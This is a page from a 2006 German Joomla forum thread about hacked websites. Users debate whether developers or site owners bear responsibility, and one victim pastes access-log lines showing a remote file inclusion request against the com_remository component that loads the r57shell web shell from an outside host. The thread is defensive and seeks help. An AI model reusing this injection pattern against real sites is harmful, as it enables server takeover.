+ Antworten
Seite 2 von 8 ErsteErste 1 2 3 4 5 6 ... LetzteLetzte
Ergebnis 11 bis 20 von 75

Thema: Seiten gehackt

  1. #11
    Kommt häufiger vorbei
    Registriert seit
    25.07.2005
    Beiträge
    434
    Bedankte sich
    16
    Erhielt 120 Danksagungen
    in 107 Beiträgen

    Standard

    Zitat Zitat von Papillon
    .....
    Einfach hier nur Frust ablassen wie schlecht doch alles ist, stößt bei manchen eben etwas übel auf.
    Gruß Papi
    Zeig mir mal die Stelle wo im Posting von Webmasterin nur "Frust abgelassen wurde".
    Eher im Gegenteil. Viel sachlicher geht es schon fast nicht mehr.

  2. #12
    Hat hier eine Zweitwohnung Avatar von Papillon
    Registriert seit
    07.05.2005
    Beiträge
    1.217
    Bedankte sich
    79
    Erhielt 278 Danksagungen
    in 195 Beiträgen

    Standard

    Zitat Zitat von ajuch
    Das mit der config.php ist IMO nur eine zusätzliche Sicherheitsmaßnahme. Meiner Ansicht nach sollten die Skripte soweit geschützt sein (Input Validation, etc.), dass der Angreifer nicht automatisch alles Ändern kann was er will. Das ist für mich so wie wenn ich die Haustüre nicht absperre, aber den Geldbeutel anbinde.
    Richtig. Die meisten der hier in letzter Zeit aufgetauchten Hacks konnten aber nur aufgrund einer Kombination verschiedener Lücken bzw. falscher Einstellungen erfolgreich sein.
    Zitat Zitat von ajuch
    Das mit der OSS ist für mich auch ein ganz verständlicher Punkt. Als begeisterter Linux und Open Source Anwender bin ich es aber gewöhnt, dass experimentelle Software als Alpha bzw. Beta gekennzeichnet wird und nicht als stable verkauft wird. Das scheint hier etwas falsch zu laufen.
    Ein Punkt, dem ich zustimmen kann. Wurde ja auch schon in anderen threads angesprochen, dass eine Art Zertifizierungsstelle durchaus sehr hilfreich wäre, auch wenn selbst dies nicht absolute Sicherheitsgarantie geben kann.
    Zitat Zitat von ajuch
    Und das hier prinzipiell der Anwender zuerst mal als dumm hingestellt wird, finde ich so auch nicht ok.
    Dies war auch nicht im Mindesten meine Absicht. Meine Frage ("Oder irgendein neues Sicherheitsloch entdeckt?") war ernst gemeint. Leider habe ich darauf ja keine Antwort bekommen.
    Allerdings darf man schon auch nach der Verantwortung der User fragen. Nur zu fordern, die Entwickler sollen endlich mal sicher Software programmieren, ist eben etwas zu einfach. Natürlich sollen sie das, aber für einen Teil der Hacks sind die User nunmal mitverantwortlich. Man braucht sich ja nur mal die täglichen posts zu den Hacks durchzulesen.
    Als dumm würde ich keinen Anwender (bin ja auch einer) hinstellen, wohl aber mitunter als fahrlässig.

    Gruß Papi
    Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de

  3. #13
    Hat hier eine Zweitwohnung Avatar von Papillon
    Registriert seit
    07.05.2005
    Beiträge
    1.217
    Bedankte sich
    79
    Erhielt 278 Danksagungen
    in 195 Beiträgen

    Standard

    Zitat Zitat von langsch2
    Zeig mir mal die Stelle wo im Posting von Webmasterin nur "Frust abgelassen wurde".
    Eher im Gegenteil. Viel sachlicher geht es schon fast nicht mehr.
    Dann haben wir eine unterschiedliche Wahrnehmung.

    Zitat Zitat von webmaster
    Ich hab so langsam keine Lust mehr auf diese Art von Spielchen.
    Zitat Zitat von webmaster
    Ich kann nicht einfach so etwas erstellen, dass so löchrig ist wie ein Schweizer Käse!!!
    Und mich dann nicht mehr drum kümmern.
    So gehts nicht.
    Wenn jemand fast nur Kritik übt, und dies - in meinen Augen - wenig konstruktiv tut, so empfinde ich das als Frust ablassen.

    Um wieder etwas zum Thema zurückzukommen:
    Einen guten Ansatz der Joomla-Entwickler auf die Sicherheitslöcher in den Dritt-Anbieter-Komponenten gibt es hier:
    http://dev.joomla.org/component/opti...s:make_secure/

    Gruß Papi
    Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de

  4. #14
    Kommt häufiger vorbei
    Registriert seit
    25.07.2005
    Beiträge
    434
    Bedankte sich
    16
    Erhielt 120 Danksagungen
    in 107 Beiträgen

    Standard

    Zitat Zitat von Papillon
    Dann haben wir eine unterschiedliche Wahrnehmung.

    Wenn jemand fast nur Kritik übt, und dies - in meinen Augen - wenig konstruktiv tut, so empfinde ich das als Frust ablassen.

    Um wieder etwas zum Thema zurückzukommen:
    Einen guten Ansatz der Joomla-Entwickler auf die Sicherheitslöcher in den Dritt-Anbieter-Komponenten gibt es hier:
    http://dev.joomla.org/component/opti...s:make_secure/
    Gruß Papi
    Das kommt imer darauf an *welche* Stellen man zitiert und welche man weglässt :-)

    Zum Thema Sicherhet zurück. Mir ist in den letzten Tagen eine zugegebenermassen etwas "abstruse" Idee gekommen: Phalanger - Mono oder -.NET Kombination.

    Wem das jetzt nichts sagt: http://www.heise.de/newsticker/resul...ords=Phalanger

    Wäre das ein Weg den man ernsthaft in Erwägung ziehen könnte?

  5. #15
    Hat hier eine Zweitwohnung Avatar von Papillon
    Registriert seit
    07.05.2005
    Beiträge
    1.217
    Bedankte sich
    79
    Erhielt 278 Danksagungen
    in 195 Beiträgen

    Standard

    Zitat Zitat von langsch2
    Das kommt imer darauf an *welche* Stellen man zitiert und welche man weglässt :-)
    Ok, ich geb's zu! Aber schließlich hast Du mich ja auch nach einer Stelle gefragt.
    Zitat Zitat von langsch2
    Zum Thema Sicherhet zurück. Mir ist in den letzten Tagen eine zugegebenermassen etwas "abstruse" Idee gekommen: Phalanger - Mono oder -.NET Kombination.

    Wem das jetzt nichts sagt: http://www.heise.de/newsticker/resul...ords=Phalanger

    Wäre das ein Weg den man ernsthaft in Erwägung ziehen könnte?
    Da kenne ich mich nicht mit aus. Aber wo bliebe der Open Source-Gedanke, wenn man nur noch die binaries herausgibt, oder blicke ich es gerade nicht?

    Gruß Papi
    Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de

  6. #16
    Kommt häufiger vorbei
    Registriert seit
    25.07.2005
    Beiträge
    434
    Bedankte sich
    16
    Erhielt 120 Danksagungen
    in 107 Beiträgen

    Standard

    Zitat Zitat von Papillon
    ....

    Da kenne ich mich nicht mit aus. Aber wo bliebe der Open Source-Gedanke, wenn man nur noch die binaries herausgibt, oder blicke ich es gerade nicht?

    Gruß Papi
    Ich schrieb ja, "etwas abstruse Idee" :-)

    Das ganze soll angeblich auch unter "MONO" laufen. Die Sourcen kann man trotzdem rausgeben. Und Mono ist OSS. Aber wie gesagt, selbst mir erscheint die Idee im Moment noch etwas "merkwürdig....

  7. #17
    Hat hier eine Zweitwohnung Avatar von Papillon
    Registriert seit
    07.05.2005
    Beiträge
    1.217
    Bedankte sich
    79
    Erhielt 278 Danksagungen
    in 195 Beiträgen

    Standard

    Zitat Zitat von ajuch
    Das Problem liegt meiner Meinung nach an einer teils schlecht durchdachten, schlecht dokumentierten und nicht sauber implementierten API. Die Entwickler von Komponenten müssen einfach ein Framework zur verfügung haben das ihre Komponenten automatisch gegen grobe Schnitzer absichert UND ihnen die Entwicklung erleichtert. Dieses Framework muss auch gut dokumentiert sein.
    Möglicherweise ist die 1.5er Version ja auch so toll wie wir es uns alle erhoffen, aber wenn sie auf der aktuellen Version aufbaut, bin ich ehrlich gesagt pessimistisch.
    Ein paar Ansätze sind in der 1.5 schon zu erkennen.
    Dass wir uns nicht falsch verstehen: Da gibt es von Seiten der Joomla-Entwickler sicher noch einiges zu tun. Mir geht es nur darum, dass jeder sein Bestes geben soll. Und dazu gehört auch der Entwickler von Komponenten und der Anwender. Nur zu fordern, die anderen sollen, ist mir zu einfach.
    Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de

  8. #18
    Hat hier eine Zweitwohnung Avatar von Papillon
    Registriert seit
    07.05.2005
    Beiträge
    1.217
    Bedankte sich
    79
    Erhielt 278 Danksagungen
    in 195 Beiträgen

    Standard

    Zitat Zitat von ajuch
    Momentan sind solche strukturellen Änderungen aber fast unmöglich, da mit einem Schlag alle Komponenten angepasst werden müssten. Langfristig (Version 1.5) sollte das IMO aber auf jeden Fall passieren.
    Da hat man leider auch dem Druck der Anwender nachgegeben.
    Gelöste Threads bitte markieren: Anleitung | Joomla 2.5-Tutorial: Schulhomepage mit Joomla 2.5 erstellen | Winged Messenger: www.joomla-fortbildung.de

  9. #19
    Verbringt hier viel Zeit
    Registriert seit
    15.06.2005
    Beiträge
    944
    Bedankte sich
    44
    Erhielt 209 Danksagungen
    in 188 Beiträgen

    Standard

    Dass in der letzten Zeit so viele joomla Seiten betroffen sind, kann vielleicht auch damit zu tun haben, dass eine zentrale Hack Datenbank kürzlich auf joomla umgestiegen ist.

    Mir wurde mal meine 4images Galerie gehackt und ich hatte dann im Internet nach der Hackergruppe etwas recherchiert und dabei war ich auf www.zone-h.org gestoßen.

    Dort scheint über alle Hackerangriffe im Internet genau Buch geführt zu werden und es werden dort stolz alle gehackten Webseiten gelistet incl. einer Hacker Top List usw.

    Diese Seite läuft jetzt auf joomla (vorher wars irgendwas anderes). Die haben sogar eine eigene Komponente com_attacks entwickelt.
    http://www.zone-h.org/component/opti...cks/Itemid,43/

    Wenn man oben auf 'enable filters' klickt kann man nach attacker, webseite, Datum etc. etc. suchen.

    Da haben die natürlich die joomla software genau unter die Lupe genommen nehme ich an ...

    Nachtrag: wenn man es genau nimmt, könnte man es dann aber direkt schon als ein Kompliment werten, wenn sich die Hacker dann doch selber für joomla entscheiden ...
    Geändert von bluecafe (13.08.2006 um 12:01 Uhr)

  10. #20
    Kommt häufiger vorbei
    Registriert seit
    31.07.2005
    Ort
    Graz
    Alter
    32
    Beiträge
    349
    Bedankte sich
    44
    Erhielt 9 Danksagungen
    in 8 Beiträgen

    Standard

    morgen,

    auch meine Seite wurde gehackt und ich habe folgendes aus dem ftp log auslesen können:
    81.214.181.200 - - [12/Aug/2006:16:42:09 +0200] "GET /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36857 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    81.214.181.200 - - [12/Aug/2006:16:42:17 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 8842 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    81.214.181.200 - - [12/Aug/2006:16:42:27 +0200] "POST /administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt? HTTP/1.1" 200 36757 "http://www.****/administrator/components/com_remository/admin.remository.php?mosConfig_absolute_path=http://rst.void****/download/r57shell.txt?" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)"
    Könnte mir jemand eine Info dazu bitte geben?
    Grüße
    killa

+ Antworten
Seite 2 von 8 ErsteErste 1 2 3 4 5 6 ... LetzteLetzte

Ähnliche Themen

  1. Module auf bestimmten Seiten ausblenden
    Von X-Dimension im Forum Allgemeine Fragen zu Mambo
    Antworten: 13
    Letzter Beitrag: 08.03.2007, 15:59
  2. mosPathway: statische Seiten
    Von rollo27 im Forum Joomla Komponenten
    Antworten: 9
    Letzter Beitrag: 14.06.2006, 22:10
  3. Seiten mit {mospagebreak} werden nicht angezeigt
    Von eresbe im Forum Joomla Mambots
    Antworten: 2
    Letzter Beitrag: 21.04.2006, 17:10
  4. Verknüpfung mehrerer Seiten
    Von Aldarin im Forum Module / Komponenten Suche bzw. Entwicklung
    Antworten: 4
    Letzter Beitrag: 31.01.2006, 13:25
  5. Sicherheitsloch in Mambo? 2 Seiten über Nacht gehackt!
    Von rennic im Forum Allgemeine Fragen zu Mambo 4.5.0
    Antworten: 2
    Letzter Beitrag: 29.01.2004, 14:03

Lesezeichen

Berechtigungen

  • Neue Themen erstellen: Nein
  • Themen beantworten: Nein
  • Anhänge hochladen: Nein
  • Beiträge bearbeiten: Nein